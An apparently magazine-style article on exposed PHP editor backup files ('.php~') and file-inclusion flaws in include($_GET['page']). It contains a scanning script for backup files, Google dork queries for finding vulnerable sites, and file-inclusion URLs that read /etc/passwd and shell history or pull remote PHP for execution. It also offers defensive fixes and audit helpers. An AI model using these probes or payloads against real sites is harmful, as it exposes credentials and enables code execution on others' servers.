Google Tem-PHP-tations

by Craig Stephenson  (cstephen907@gmail.com)

This article originally had nothing to do with Google.

It started as an interesting observation about tildes that led to a couple of unsettling thoughts about search engine URL pattern matching.  I get the feeling that I've only scratched the surface.  The ability to search for websites based on their URLs opens many doors, and that might just be a problem if the wrong person knows the right thing to search for.

Note that while this article is written with PHP in mind, the same concepts might also apply to other web languages.  The tilde observation in particular is really more about Apache than PHP.

The .php~ Problem

I've done web development mostly on Linux machines for several years.

During this time, I've noticed myself and others occasionally junking up web directories with useless Emacs/gedit backup files.  Both editors can save these backups automatically, and the behavior is enabled by default on some Linux distributions.

When a file is edited using one of these text editors, a backup copy of the original file is automatically saved as: <filename>~

For example, myfile.txt backs up as myfile.txt~.

This feature can avert disaster if a file is accidentally removed or damaged, but otherwise it's easy to forget it's happening.  GNOME even goes the extra step of hiding files ending with "~".

While accumulating hoards of mostly-useless backup files is annoying in its own right, the real problem is that Apache relies on a file's extension to know how to serve it.

A properly configured Apache server knows that a file ending in .php needs to be processed server-side before sending any content to the user.  Unlike utilities such as the file command, Apache doesn't automagically know a file's type by its contents.  Rename a file's extension and Apache will change the Content-Type HTTP header accordingly.  It's fickle like that.

What happens if you rename a .php file to .php~?

Apache won't recognize the file as a PHP script and will make no attempt to process it as such, opting instead to treat it as a plain text document.  Now all of the PHP code never intended for user eyes is visible to all.  Or, to be more accurate, the previous version of the PHP code, though the differences are probably slight.

So, chances are good that anybody using Emacs or gedit to edit PHP files directly in their web directory is creating publicly exposed backups of their files.  Finding them is as easy as adding a "~" at the end of the URL.  This isn't necessarily the end of the world.  What secrets might one expect to find in exposed PHP code anyway?

Database passwords come to mind.  Any MySQL-driven PHP website is likely to have a hard-coded database password.  Usually in plain sight, like this:
mysql_connect('localhost', 'username', 'password');
Alarming though this may look, it's rare to find MySQL servers that accept remote connections.

That's not to say a curious person on the same network couldn't wreak some havoc.  A MySQL password might also open the door for some neighborly snooping on a shared web hosting provider.  And, of course, there's always the very real possibility that the reckless novice who runs this website uses the same password for a lot of things, such as logging into their web account, email account, or SSH account.

If you're adept at PHP, an exposed file can be an exciting can of worms.  Are there any other hard-coded passwords?  Is the code referencing files or file paths you're not supposed to know about?  Does the code neglect to properly validate user input?  Is there evidence that the server has register_globals enabled?  Are there any juicy comments?

The problem can be solved in a number of ways.

Emacs' or gedit's automatic backup feature can be disabled.  Programmers can refrain from editing production copies of scripts, which is bad practice anyway.  Apache can be configured to not serve .php~ files.  Even some old-fashioned housekeeping would keep trouble at bay.  But a web developer is unlikely to make these changes unless they are already aware of the problem.
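
The housekeeping option can be sketched in a few lines of shell.  This is only an illustration: the function name list_backups and the default path /var/www/html are assumptions, not anything a particular distribution provides, so pass in your own document root.

```shell
#!/bin/sh
# Hypothetical helper: list editor backup files (names ending in "~")
# under a web directory so they can be reviewed and removed.
# The default path below is an assumption; pass your own document root.
list_backups() {
    find "${1:-/var/www/html}" -type f -name '*~' | sort
}
```

Running list_backups /home/jdoe/public_html prints one path per line.  Once the list looks right, the same find expression can be used to delete the files.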

It's simple enough to scan a website for tilde'd files.  Simple, if not pretty:

get-php.sh:
# Recursively download PHP files.
wget -r -A '*php*' -T 3 -t 1 http://www.example.com

# Files are stored in a directory named after the website's domain.
# Use find and Perl to list every PHP file, append ~, then attempt to access.
find . -iname '*.php*' |
perl -ne 'if (m/\.\/(.*\.php)/) { print "http:\/\/$1~\n" }' |
sort | uniq |
wget -i - --spider --max-redirect=0 -T 3 2>&1 |
grep -B 6 "Remote file exists"
But this takes forever, even just for one website.

You can increase your odds of finding a website with tilde'd files by looking out for websites that meet the following criteria:

Running on a Linux machine with interactive login access.

Running small-scale, custom-made PHP code.

Personal websites hosted on university computer science department servers seem most susceptible, which is ironic but not shocking.

The following Google search string can help you unearth some of those:
site:*.edu/*.php cs
Or, if you want a sneak peek at what's out there, you might just search for this:
site:*/*.php~
Unfortunately, you have to wade through a lot of crap to find the interesting stuff.

God knows how these URLs got indexed in the first place. Probably at one time or another, all of these websites were missing an HTML or PHP index file and Apache's auto-indexing revealed the tilde'd files to Google.

The GET/include() Problem

It's hard to imagine that somebody would have a legitimate reason to search for a URL ending with tilde.

I was amazed that Google dutifully returns the results for these types of searches given its history of highly granular manual intervention (e.g., Google.cn censorship, Google's instant blacklisting).

Don't they know they're inviting trouble? What else don't they know?

There's another problem I've seen once or twice during my experiences with PHP.

It starts with the include() function, which allows a PHP script to include (execute) the code from another PHP script.

You might use this function, for example, to import common configuration variables into a page:
<?php
  include("config.php");
  // page content
?>
Less judicious web developers use include() to pull in common chunks of HTML code.

For example:
<?php
  include("header.php");
  // page content
  include("footer.php");
?>
And some developers like to use include() for just about everything.

For example:
<?php
  include("header.php");
  include($page);
  include("footer.php");
?>
The problem with this last example is that the script needs to know what page the user is trying to access to include the appropriate file.

The oft-used and ill-advised solution is to get the name of the page's PHP file from the request's GET parameters. If the URL looks like this:
http://www.example.com/index.php?page=contact.php
Then chances are good that index.php contains the following line: include($_GET['page']);
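
For anyone maintaining a site like this, the pattern is easy to look for in your own code.  The following is a rough sketch, not a complete audit: the function name find_request_includes is made up for illustration, and the regular expression is a heuristic that only catches a request variable passed directly to include or require.

```shell
#!/bin/sh
# Hypothetical audit helper: print lines in .php files under a directory
# where include/require is handed a request variable directly.
# This is a heuristic; it misses indirect cases such as
#   $page = $_GET['page']; include($page);
find_request_includes() {
    # /dev/null forces grep to print the file name even for a single file.
    find "${1:-.}" -type f -name '*.php' -exec grep -nE \
        '(include|require)(_once)?[[:space:]]*\(?[[:space:]]*\$_(GET|POST|REQUEST|COOKIE)' \
        /dev/null {} +
}
```

Each hit is printed as file:line:text.  A safer design maps the page parameter onto a fixed list of known pages instead of passing it to include() as-is.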

In many cases, you can confirm these suspicions by throwing some random nonsense into the page parameter. Results will vary depending on the website's level of error reporting and error handling, but it's not uncommon for something like this:
http://www.example.com/index.php?page=asdf
To return something like this:
Warning: include(asdf) [function.include]: failed to open stream: No such file or directory in /home/jdoe/public_html/index.php on line 147
This very explicit admission of insecurity comes complete with the full file system path of the website's document root.

You can throw whatever you want into the page parameter and the PHP script will try to include() it. Including any text file will generally display it right in the web page.

There are a variety of safeguards the server might have in place that could mitigate this vulnerability, such as running Apache in a chroot jail, but especially unhardened servers will let you sneak one of these by:
http://www.example.com/index.php?page=/etc/passwd
Although you're hindered by the fact that you can't run the ls command, there are clever ways you might be able to learn more about the machine.

Who knows what treasures are hiding in a shell history file, if one exists?
http://www.example.com/index.php?page=../.bash_history
If you're lucky enough to find a web server with PHP's allow_url_include configuration flag enabled, you can even do this:
http://www.example.com/index.php?page=http://www.legitimate.com/remotefile.txt
There's really no use in this, however, unless you get thrills from seeing your text appear on somebody else's website.

It would be far more interesting to get the website to include your own code. You could always set up your own Apache server and tell it to serve PHP files as plain text so they don't get processed before being served.

But why go through the trouble when PHP's include() function will execute code regardless of the file's extension?

In other words, allow_url_include lets you do the following:
http://www.example.com/index.php?page=http://www.legitimate.com/phpscript.txt
But I'm surely not the first person to connect these dots.

What does this have to do with Google, anyway? Simply that, as I write this, the following search string claims "407,000,000" tempting results:
site:*/*.php%3f*=*.php